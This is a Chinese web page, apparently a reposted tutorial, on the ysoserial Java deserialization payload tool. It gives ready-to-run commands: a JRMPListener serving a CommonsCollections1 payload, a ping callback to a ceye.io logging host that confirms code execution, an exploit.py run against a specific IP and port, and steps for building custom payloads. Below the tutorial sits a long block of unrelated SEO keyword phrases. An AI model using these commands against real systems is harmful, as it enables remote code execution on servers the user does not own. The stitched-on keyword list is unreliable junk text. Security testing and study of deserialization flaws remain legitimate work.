反序列化工具ysoserial使用介绍
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,反序列化工具ysoserial使用介绍0x00 ysoserial是什么?ysoserial集合了各种java反序列化payload;下载地址:https://github.com/angelwhu/
千家信息网最后更新 2025年01月20日反序列化工具ysoserial使用介绍
反序列化工具ysoserial使用介绍
0x00 ysoserial是什么?
ysoserial集合了各种java反序列化payload;
下载地址:https://github.com/angelwhu/ysoserial
0x01 基本使用方法
在公网vps上执行:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'port:公网vps上监听的端口号
commands:需要执行的命令
例子:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2 rce.267hqw.ceye.io'重启一个shell窗口:
python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】 【JRMPListener port】 JRMPClient列子:
python exploit.py 118.89.53.139 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139 1099 JRMPClient0x02 在ysoserial编写自己的payload
- git clone https://github.com/fanyingjie2/ysoserial.git
- 将自己编写的payload放在下载的包中:路径ysoserial/src/main/java/ysoserial/payloads/
- 修改Dockerfile
- docker build -t ysoserial .
- docker run -ti ID号 /bin/bash
- 在docke中执行 apt-get update
- 在docker中执行apt-get install lrzsz
- sz target/ysoserial.jar
序列
目标
公网
工具
使用方法
例子
口号
命令
地址
方法
端口
路径
列子
监听
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
配资软件开发和销售
php 无需数据库源码
网络安全法称网络数据
软件开发工程师招聘信息网
ibm服务器M5
widos服务器安全性密码
软件开发合同协议样本
自我保护网络安全演讲稿
双鸭山数据库
丰富基础数据库
三大数据库高级检索
网络安全工作责任制目标
武汉爱心宝网络技术
网络安全支撑服务工作组织架构
天津节能软件开发多少钱
远程管理服务器密码
计算机软件开发编程
管家婆用哪个服务器好
广告自动挂机软件开发
服务器密码忘记了
怎么查验戴尔服务器内存真伪
上海奥鹰网络技术有限公司
南城软件开发有限公司
浙江省厅放射医生数据库
继教通连接服务器失败怎么回事
海宁住宿软件开发
某软件开发公司通过职务分析
凯里网络安全系统怎么样
上海静安冷冻链软件开发公司
公司数据库开发软件
